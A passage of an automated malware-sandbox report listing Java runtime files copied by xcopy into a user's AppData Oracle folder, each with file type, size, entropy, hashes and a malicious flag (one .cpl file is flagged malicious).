Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	146432
Entropy (8bit):	6.445414343989512
Encrypted:	false
MD5:	756DD54AE83EB09996BA35FF49DDD074
SHA1:	98F17C09BA9374EBD10348F446819E8CF1093E21
SHA-256:	DCFA29224930D7E8DAD9809457AABE3AD574E38C462CA4EEDEFB8952E3A003F5
SHA-512:	95482BC79124C38D37C51963E64951795C9670B3FB82494F6C84654E0ED94B4947740FCBBCC042621B67B23F186A683115B2D1CF2E912DF28477AD69EA03E78D
Malicious:	true

C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):	68520
Entropy (8bit):	6.347648249650431
Encrypted:	false
MD5:	B189CEE3C0CB5C9EABBF70329E0F4195
SHA1:	1FE87B9C1CF10EA026520DD60E3C74EBA24AD457
SHA-256:	FF851ACE2EF7EA8D002EEA6D8E6FAD835F5AD5575BA083938C57416F47ECCE37
SHA-512:	D6AF6CE3D67C3BBFA3E2B48AC47DA35099A95602C3C2ABF1C82EF6BF8FA346CEBE05B468DF2E48C3C31F89FB7331881F58E6A55BB415E175679B17365599B768
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	60328
Entropy (8bit):	6.7519128813646025
Encrypted:	false
MD5:	661B301EC2FF6103A5E6C6430F540D7F
SHA1:	E2AE51BB5B166DA592FDAD0866083345FB4B6386
SHA-256:	8A33EA86E49FC26E73914E26401075EB79D7052DCAD756469334DB9A3C645A00
SHA-512:	D138464C321D3DD867BC423CB2F0735DB88D0DE465256D7130ECA6D7796394FFC05D01D970D7EA3D0200E77CCFC82225E150445D11BE444E668056D6E043E3D6
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font_t2k.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	436136
Entropy (8bit):	6.654345685389528
Encrypted:	false
MD5:	773A1D753101335331537450BA5B7CCA
SHA1:	B9E1AD266A1C522019F9DB26D8554721B6174DDD
SHA-256:	ED32394F90D1F2F731DE956E4BD800548CF97F3F872B03F4497B91C669C3630B
SHA-512:	B6D12D9DCC34585C398FC77358F12E8ACB3DD80B9B2605D3CE4F4FE3C1151C3BE71F461AABF1C336CEC3203D5FC8C87BFA62ED7B13D86D70D249737087BD16E7
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	118696
Entropy (8bit):	6.660745237283745
Encrypted:	false
MD5:	959A460FFF1FC5DDDB57702D5048D60F
SHA1:	D963ADFC3D87D839107D2165D7C7E3B9E66EDA25
SHA-256:	E4D934BC9C35FF4F2E60CE7C3DC5862AD7DB1ADE069E2C73B2396D1428ECD3EE
SHA-512:	942F3DF20D0E9332C43F34631B378BA2ED1CC58E913E3A133A4988E55B3A52021CB2E2C6C4A5A920BBDB21448138395EED76B62BCC4024A7ADDE01DD4382FAEC
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):	191400
Entropy (8bit):	6.752462560029425
Encrypted:	false
MD5:	C731C96456335BDAA2F58220AE25A202
SHA1:	54E1E9A3BDA04775A09660949622A7579A6042FB
SHA-256:	EB1EEE4B4E4343EC3EEA5430786D605A07CF2E8344C55C0972A95421AEAC78C4
SHA-512:	EB9A74B982B5EED61FCC1DF228EB4760B7A41898BC9E6C5E501FCBEDC2CB5E405000E7AD8AE021D074F1B21670D72CBB64E8AD24C63143BC437CF96801708454
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):	272296
Entropy (8bit):	6.42136271433574
Encrypted:	false
MD5:	9DAEE38424615751379400964713D6D7
SHA1:	F9A4C9E8CEFA5141FC798FEBA2453C8A0E4BAECC
SHA-256:	196930390C56C711DFA4E1CC42109CE5D957DF016C9CB7BF0C6F30C79A3A71F5
SHA-512:	C739EB963AB9C868E19134DFE955E6B65B51036AB1EB7DA18D8466E8EF90EFA9AF33D3119EC0FC695D730C8779517A4D432D3F480B5202FD7291BC3937D73442
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	14248
Entropy (8bit):	6.298408670775613
Encrypted:	false
MD5:	E3FFC51723A9F841777B84C98DEEA2C3
SHA1:	766098CBF335EB1895F7EE8E9A82A2E2D634D98C
SHA-256:	241037DB7C0AFD5E9FB0DADA97DF018B9DA2813BAF8CF8132794EB4ADC9F8412
SHA-512:	F57252A6B1A1E2BBA6809AA73B242D85031ACF4B7B9B331B2A5FFF4D8BF30514AFA835305B81CFBC126D73D6F20DC0D49955F7612013C9282FECC570B13AE4FF
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	164264
Entropy (8bit):	6.784805209513275
Encrypted:	false
MD5:	53B2A7DB8DDC169929CF060EA986CB5B
SHA1:	674349D59647994264BB83005A98F1411353685F
SHA-256:	9C4DD495DD93C251F070656418690C310D54F005A5B237B33AE5E3719CDBC957
SHA-512:	9803071559C42FF6E882985DB3A7DBC0E9CC3DB337E10459510A58D963290FFC73A801162A7AFBA279C8B13C612ECC4D7F42C5085EBB02976DEBE2C8969B5873
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	22952
Entropy (8bit):	6.633951210571417
Encrypted:	false
MD5:	A52BD24E5CE3BC6CB2FC0319FA7357C7
SHA1:	CC31D6480548EE926DB5675B0194C744E22E5864
SHA-256:	0000FE81BDDF4BEF85C41D157C22E9D8020850D5BBC1085952352D821E813C90
SHA-512:	BED4BADD240B22EA12510BAD001FA07B73C58A1C10D3E8A74FA310AFD79E8C489F6C926C9018FC1328D5DB6D2DA3ED2B226C19CADF84833C319F55418A55EC5A
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	117160
Entropy (8bit):	6.608214422956882
Encrypted:	false
MD5:	1CB70061CE043B92DF2ADF0413F0101E
SHA1:	69B1B555ABE5B72438F2097D5F186ED92326F71B
SHA-256:	27CC1E6009C3B5341137EF19A32127DA5E9572C8E2C6DC3E758FC7944231BF8D
SHA-512:	6B0230B7F25EB7856BCC463C9CFD7C0109C532259DF3730FEEC5FD04253C9F40A2D1F7E1398FD45F87C2B95ACCBC51D60B6C5D0C027E2FF6A5588EA780AB2CB1
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	16311720
Entropy (8bit):	6.549046864447487
Encrypted:	false
MD5:	720DBE4B56D9CE64DE4E906377371C02
SHA1:	A29FB1C6D9BA3557B2CC436282DE724252A1C61A
SHA-256:	15FF6B1D0BAF6237C462F1E8A26FE2BE5EA6515BDB59CDD2DE9ABE23384CA5F3
SHA-512:	5FEF7A9B4385B74648E1439E1768376E15DA79A0C84D48ABBD4C6950350AB73CFDCEFAEDD9E9DAC67826B43A6AEF6EE3A23DE197443831665F239D112724D86F
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Size (bytes):	15784
Entropy (8bit):	6.446311471502684
Encrypted:	false
MD5:	E57ED773B6CB41DE8225A10AFE149510
SHA1:	CEF1D12A0D8A2C91334CCB30024768103CC95228
SHA-256:	5D9EB979F6E84AD34E3E7EB2A6FA6436B8B58BA758E317AEE65BE07BCFEE43F3
SHA-512:	58B5ED30A8AE046F36EC160A08B573E698925C0E166CA1C4B48283D81FAB5168E76A4311B049FEC1DD0883734D64ED70F6EDF5C1976318AA3DEB33B5BDD8ACE4
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	159144
Entropy (8bit):	6.813490664563571
Encrypted:	false
MD5:	56E8FCDD66E540981BEB673A713FDC37
SHA1:	D5061993CFA7AA78816AECBEA7A3B908CB2B288C
SHA-256:	4D0B123C5A42250EB7F42B473744D4D3D2B888243EB81EF86B362F6D69D3F4D2
SHA-512:	D61533D9571540D6C576FAB7AA5C69BFF1011A425BBC22DF5118EFFD2C442BD3BC63C99CAC918A8AC40CA4D14AF2771E63216C7E3F1599C80CA374F8D733080A
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	204712
Entropy (8bit):	6.635767422038773
Encrypted:	false
MD5:	1C1A8FB786E5B258E19646B3060C118C
SHA1:	C09E512862534EC911F0CDD805F4BA2C9E9E7E51
SHA-256:	593CE4119723C824E6017AFA8906092B39532DC1B4BBB9E2EE69B957E76270D4
SHA-512:	B76C65450686B21B28D3C587455AD4620758FA4F62A83C1917B2C402E591EE9489FC63794E2F3B12F87257A540F72F98075F71FF5BA8DB377E5779E9FD275D94
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):	76712
Entropy (8bit):	6.513405955257709
Encrypted:	false
MD5:	113298AC181C026AB425E38CB7F963A3
SHA1:	6D9E6470ACDB92B9A75F51EACBA066A1C21D8233
SHA-256:	E3CD55B8B460515010DBE727C4BBD39DD4B5C7E33FACF4F4D0620EBEFDDF64F0
SHA-512:	FAA61EDC11CECFEDE772E9DECFF4898ABB4FC57DE1AE72FB15F5DCAF58D2BE101C6D2A548886751D746F02ED18EDF1474418E01EA6DD6BE4F8FE5061B2EA4EA0
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	19368
Entropy (8bit):	6.379879504370466
Encrypted:	false
MD5:	6BE8323DA9289F6DAD657330C5488A23
SHA1:	3E13E43E13D716E423E3B004277D5E75AEDD7668
SHA-256:	D5C5948F6269891040684BDF980DD0AAC597D4CD24DBF1DC188C7DA1F4E67C37
SHA-512:	F4233F2C1582B38D97C638AC21D6FC144C745BDA6779C67153C211FFC1A5949B1A6DA7CEB6CFDB307986657AC728A0F6CECF7EDAA2357C6CD9B2DF02ADDE7D72
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	172968
Entropy (8bit):	6.583411236005399
Encrypted:	false
MD5:	3A6C4A891CFFF80BB708B9B62075F11E
SHA1:	E291F115D0D9C2566F077B121439A74AD52A5686
SHA-256:	364ED817DDB3BF3F07380C279BC822500537B856CDF0FECD8951E93D48A2DB3D
SHA-512:	C2EE2DEC108F1D76BF7C6A10423AB657D84BDC47B83F3F5F97E0204AE65B0274842E7AD4AEB10695256356EE6C1DF7581F6EC1BB14E68EE3532AB5F4B68FE58A
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	145832
Entropy (8bit):	6.690399508444047
Encrypted:	false
MD5:	66000FD6A78834476C75654364D9DABE
SHA1:	B308C2FD08BA88EE0A9915D1FC65C9C9BDE0856B
SHA-256:	D43E3EFFA8DA19EBD6AB60B3E149111A10952219B0A84907D5E40770D98BC628
SHA-512:	52CA0EA10A5A944BBAFCE2861B20F65A46A5AD4A198A807310922B4D95CA839F56FFA2F594B0AEB9BAE15C82390168131FC039A77E383A72E0E186961C070366
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	16808
Entropy (8bit):	6.477792921642257
Encrypted:	false
MD5:	1264C33C42DADA183575B3BE18418931
SHA1:	C8C210D72A64988C561DD1BCF683EBE9C36F73F7
SHA-256:	A7E15C6DFD1334BFE95C954A49E7B958FA2DD6C3791D7431AF8C690558107C7A
SHA-512:	EB59F3C70CAF629196BEBB1C17EBAB16C41A9181AD4EB7D0C248CDA66E0D2A5253F42A58BCC26645A5A4E908D81106B1683682A22E04E262C2B255A1D0EA670C
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	31144
Entropy (8bit):	6.617511389466037
Encrypted:	false
MD5:	092DAA352F4598E407ACCA05B70DE0D8
SHA1:	F665C9AE6C2567A594302DA594A036595D001C53
SHA-256:	50A4BCEA0F34E2E22D2CD73871E48F3C375E3C5800FBFCC7E486FD5411B6D74F
SHA-512:	686D23510CC22B698E5B3F403819E72CB8B01A67F4B832441C3B196D221A2364FFC851885B673D745F92A68007BB6BABF4513559E8793473DEE0A8325BAB4267
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	28072
Entropy (8bit):	6.632244962392208
Encrypted:	false
MD5:	7BB4EE0DF240594A0BB83E06AE35B22C
SHA1:	1F87E2BB129061606AAFC766A74645E269DA7443
SHA-256:	5E9997F33C44B3FBF4060E1D41B3466B1E49F736F43B4F34F6436F1B112DE9E0
SHA-512:	71A501D402B21AC6DD9CD363EAB1CC1C0B6AC00D033B9F2C4EC79332DA3F241C868FC2E3BEF5DBB7800B3668FB137BA2DAA0F5F33A6CA4811182BC7B362177AA
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\kcms.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	178600
Entropy (8bit):	6.801468799753532
Encrypted:	false
MD5:	6DC70508B910D2727CBEA3F12F422F54
SHA1:	A6C265E269569B2022472474A15137FAF166D195
SHA-256:	AB8A5ED9324DA300D846DFE0FC085DB73F6D6EDDA5C4C3F58837D3A27342A8C6
SHA-512:	06B21CE9040099D8E481675B60A16A57463F2A9A3A8203CE51B7509CA22365EEE0CB8BD76CE610B2DFBDF109EB7A74D6254AAD4515B337A248784DD83A513641
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Size (bytes):	15784
Entropy (8bit):	6.449619153545077
Encrypted:	false
MD5:	C126BE266A4D76737EEDD0CFB436D7E3
SHA1:	75B61A16C3FD59ADD30EE75BC71553AA2F9E048E
SHA-256:	53242F8B5FAC26BA51C4ACEC32F1BAC67F50C8A757DB3138C92EB64323950BDA
SHA-512:	3DAFC5F6AA66160CA196728F333CDE0F63CB1CF7DDAEB37D2498911FC241789056E4CCD1241E674AFE52AD7A9741556798EF27849556578282256D3B8F5C9CAC
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Size (bytes):	15784
Entropy (8bit):	6.4518562279909775
Encrypted:	false
MD5:	30791C426723A4D76ADE3EF276F3F9FC
SHA1:	57A2593E11597A5AFC2955439E43D3CDBD696CE8
SHA-256:	6BA2DA86BC05AA3505638B392159164D564B2623E86A61234C5EC8D18D478E28
SHA-512:	3889C47D941ADE90EF907EBD65F540EB93945029EBD61C5B9C1A1F00CC85CEF5B616CF280A3B6985C56D8A150627459E1D52B9199ACD5DC8010C30541103120B
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Size (bytes):	15784
Entropy (8bit):	6.45492726362244
Encrypted:	false
MD5:	8C71D92983B9BBB5B8D823D8C0FDD129
SHA1:	834FF5F0693E75D6099E184FB840DF799E0F189A
SHA-256:	CF7363F2360C5283335F32F757002A66906CAAAA03438A32947AFF293945439F
SHA-512:	1F280BC43E4E21793EE9293F8100571458D7EBC515F5444D97160406C803046EE4C8EC802DCAB48FB54C13FD856C00E0BB79C1FB0DE6990BB2496499BD7FF4F2
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Size (bytes):	15784
Entropy (8bit):	6.45212344698071
Encrypted:	false
MD5:	879578D2FAE8E10DBE30FD0B829313DE
SHA1:	4E8F58E4EA98BEDE4FB4AA458E1B204966FC138C
SHA-256:	536C7DDEFB917BE5B216390CF87363D749E9F86E63323C29A1BB402079FA2ACD
SHA-512:	1FE7AAE9BB61D89635B8D5C17A0E311DBC3BE40EB36D526AF7FAC0481EEF25F2C77C9EF9553E11ABE983E176603FE1644250464531554FD5715FBE6D0DD83028
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	188328
Entropy (8bit):	6.53227964237886
Encrypted:	false
MD5:	08A8BF8FDF33618B214E580F9CC864AF
SHA1:	A2C227E1782AD433C37DA9D01482B65A2E5C990D
SHA-256:	7F4F02780513B053CD5FFCB17AF8477444ED7233218B9B76DBCAF037D2AA668D
SHA-512:	27F462D77FA144C9436AB7EB729250037DF42DCB9DC3680899A26C5D7FBF411540CBAAD1277D52708363C53629408FF84FADF90B5805B8FA678ADA7D1AD438FB
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\management.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	33704
Entropy (8bit):	6.5399687720762385
Encrypted:	false
MD5:	BE094B7E68AD5F85825690FE303A3320
SHA1:	6D3018DC077DD6EC40A8BB8F35C45799F8FCD475
SHA-256:	D6C7F54607F5662C7C7F6061AB9BAFAA3F12FBF95393917BCE929E22E84EDD8D
SHA-512:	E61F209C3AB1B7F111EF5526A1757216F798FC8D4C259BA623DEAC42219B65767A78572B3464D94B3E5CFE24F4A473C85AC595A5A65B42B8AC9DFA2317D4A69D
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	574888
Entropy (8bit):	6.5096605936174115
Encrypted:	false
MD5:	54C4EBB712F4D274D391373D023F17EB
SHA1:	C575CD331A373907892888726B60AA2273A3471F
SHA-256:	A8024DC95DAA7D6CE4E96A095E2C50A112BFA3B988572DFE58CECB161CE0DE13
SHA-512:	E3DB55929125BB21077157445EC6947B1CF6A6A5F699EB4DAD607FA7EAF48D2E7F6D230F2A21EDBBA015659116BBB7E11FCF7789962653D9BB0933F4B8A8FB5A
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\msvcr100.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	773968
Entropy (8bit):	6.901569696995592
Encrypted:	false
MD5:	BF38660A9125935658CFA3E53FDC7D65
SHA1:	0B51FB415EC89848F339F8989D323BEA722BFD70
SHA-256:	60C06E0FA4449314DA3A0A87C1A9D9577DF99226F943637E06F61188E5862EFA
SHA-512:	25F521FFE25A950D0F1A4DE63B04CB62E2A3B0E72E7405799586913208BF8F8FA52AA34E96A9CC6EE47AFCD41870F3AA0CD8289C53461D1B6E792D19B750C9A1
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\net.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	78248
Entropy (8bit):	6.7146657631238265
Encrypted:	false
MD5:	9B0AD2EF947A7078968F3EE8F777E636
SHA1:	2E6F7E82A2860867E8553A3AD443116348469E3D
SHA-256:	0C70544439876E5A268D7ADD56629F46508331D34A54AC745DC50E006F8CE4F3
SHA-512:	B839387976E8E73FF53CB8E7C7FF21A64583AC9C2656E165AACEEB6CD82606F5903DB7CA7902D69024852FB867FE267013AC45719BD214FFCD15040204B76E6F
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\nio.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	50088
Entropy (8bit):	6.602711829771917
Encrypted:	false
MD5:	DA9E390A86E385B11886B09A1061AB4E
SHA1:	3174077EB2402C2B67895B18866CAD0CE4A798BB
SHA-256:	16757DB6897E75320F2DC135490631AE43A46F46FF13BAF402EE9093283ED68E
SHA-512:	DDFB69206C25592986B06B7BB7AB2406137DBDFF3EE13AD770230CA9D5B87DCBE629136248BB60DED56C8D8F1E13ECD26E1B226628DCCFDBB26AE4201215CD19
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	17832
Entropy (8bit):	6.4173014749783555
Encrypted:	false
MD5:	247458FB89205979E07DB33E798106E3
SHA1:	274F996618819FE641E8EED12CDBB45071F2CD58
SHA-256:	6F5A7E54D351ECC18198A579DC5014F780EC63CCF4958ED056E29526A0209613
SHA-512:	5749E267D7708E1C8F82D6411E74D443BC6F2FD8E932D30FC50AB94358536FB52C192AE7D7B6214C936668956E25F1E00EEDB830A86F08DC05F768942DC5909A
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Size (bytes):	16296
Entropy (8bit):	6.355293800421614
Encrypted:	false
MD5:	5BF6CD8A5984AA5F2607364B5BEBBA11
SHA1:	9D07EBD2D27319A3528A7440533E1D24A9B2BDD8
SHA-256:	F05B785F3AC322090F3B00909E096BD7BFC122B4BC4F74E769CD1FB84F94941A
SHA-512:	850C8DD11307EE40681CFA8984FB9154A9068DDFD9689D223FAFB59158758DF06A38709575D37B44447DF50DD2F43866842B8CB319754D3073FCB9F93D21D692
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Size (bytes):	15784
Entropy (8bit):	6.452042630751877
Encrypted:	false
MD5:	228AAF84B541C80BCFE7C1EE57502B61
SHA1:	720CE8335207A662CE378BCDE9BBBD2137A00753
SHA-256:	8C62688D74737E50E8098A584C2AF0C97B670343B74D382E295187098C5CCAD4
SHA-512:	905579427242E24C30AE7C7D0BD16D238F676A8A9520F4218033759C1B4A4588938DF744ECCEE4DE9DCDEC336CF96C4040AC2A5F48C43BAB56CBD4A4115762D3
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcr100.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	773968
Entropy (8bit):	6.901569696995592
Encrypted:	false
MD5:	BF38660A9125935658CFA3E53FDC7D65
SHA1:	0B51FB415EC89848F339F8989D323BEA722BFD70
SHA-256:	60C06E0FA4449314DA3A0A87C1A9D9577DF99226F943637E06F61188E5862EFA
SHA-512:	25F521FFE25A950D0F1A4DE63B04CB62E2A3B0E72E7405799586913208BF8F8FA52AA34E96A9CC6EE47AFCD41870F3AA0CD8289C53461D1B6E792D19B750C9A1
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	169384
Entropy (8bit):	6.372781923527879
Encrypted:	false
MD5:	D7492728A4C06EC99B10F8219B1F31F5
SHA1:	5E58CB333F3A46CD88A9D5808D4BDE1AF1F63D21
SHA-256:	383A3A5BD74FC5411DCAF7358028FD7B003D59848162C197268A965445C3D41F
SHA-512:	231F67015AA78513449A9FEE48BF510D67D2D6CA2349007D6952B8DBF5A8D74A68FC0C748638B1FA3C4602A8440CBE35169BDDD29804AEAC62BDA95937002E06
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Size (bytes):	16296
Entropy (8bit):	6.4917332983718605
Encrypted:	false
MD5:	F340F09E5124455FA81AB8EFE04DCCC3
SHA1:	8A410F57DFBB4E2EB1EBD775C43BDE326AC65CB3
SHA-256:	B493FBB7388220FCCCC3553540B7F26D00D4826775A9EFF27128D8D3627D5E68
SHA-512:	A632A27A52AC7C2AF36EE5AC8B1F4ED806AA5B62545461D280E6951B49ADE4F39DBD6174B695976F6D82129BFD014700DC735F741210601F09E3BB1589BB590C
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	47528
Entropy (8bit):	6.511536562271216
Encrypted:	false
MD5:	4FAA26EC21CE2EF1A0642470D56170B2
SHA1:	3821E48C77BE24D0DC4A604EF8BE8A6674D578EC
SHA-256:	25F108E1A0C85F9062611D633A3E6BF01FDE06E702A753B7611320DE8AF30E56
SHA-512:	85EE3C2AB3188A4200BAF9AE628023F871DB6BBCF395AF1EAFA21812D98632CCE9D07C17D2BA3C2C3DA6B72CA6FF1E081121E5F316F7C69671BDBAEFD3D80E11
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	142760
Entropy (8bit):	6.04045807855925
Encrypted:	false
MD5:	820884E5012F0A7781C35B168EBBF5D9
SHA1:	38CDD10AEE115103AB6FE4CB9398B726F7C03433
SHA-256:	BCA7EAE564CFAAD191C47F53CA0203056E6566CBE9E6AB15273530330B262784
SHA-512:	6E644671EF134FEAD90C3A1011BE10308BBEF8ACD51D189FDA190D0BBA5A9F701255C246682D65358C9EAEFBAAAD8C285BE3210B7A1FA1B0BC3226F4FDD2BB75
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\prism_es2.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	39848
Entropy (8bit):	6.553916867342133
Encrypted:	false
MD5:	3994A89E0939701CF416EFA441266E0A
SHA1:	D16A65DBDB0B8E02AFA30FF01B99B535B3DE2A88
SHA-256:	9D4C256924077278472E7F8EF04D6225696BD40925179B7526F57836B93BB4AD
SHA-512:	14B5E97CFD296BA2B3C07DDB45704A75305451169A879C06DCBFA29B5F7C443D03899E3F4733A889E0422468A36B0D1171E12A91564C7A2F5195756F4FD2AA5D
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	48040
Entropy (8bit):	6.613539121593689
Encrypted:	false
MD5:	E441EEE17F85AE6FFA3E0606C6CD2626
SHA1:	20B236729DAD8AFE190052296F95F89BF7CD48D6
SHA-256:	CE6B8669EEEB107768E69891763738615B6B2854F7B48C0B2B58FA8288A3CCFF
SHA-512:	5A42E4533B7553D46372A3FB4181A2AB651C5149DFBFC5D34638D81CCF5B10681B3DBE254967B48564AF82400D4D1A87F5AF055CB9329B42279214A85B6C8BA6
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	14760
Entropy (8bit):	6.479791283792249
Encrypted:	false
MD5:	01A6F2ECCCBE51B60DC8AEB02264FCC3
SHA1:	2A3D37602AE7F052F543A94DB686D91657E0F37F
SHA-256:	71C433D72F5A3DED0C63D939638DF26DEAC9D64D0201E7BC69423056594BDFDC
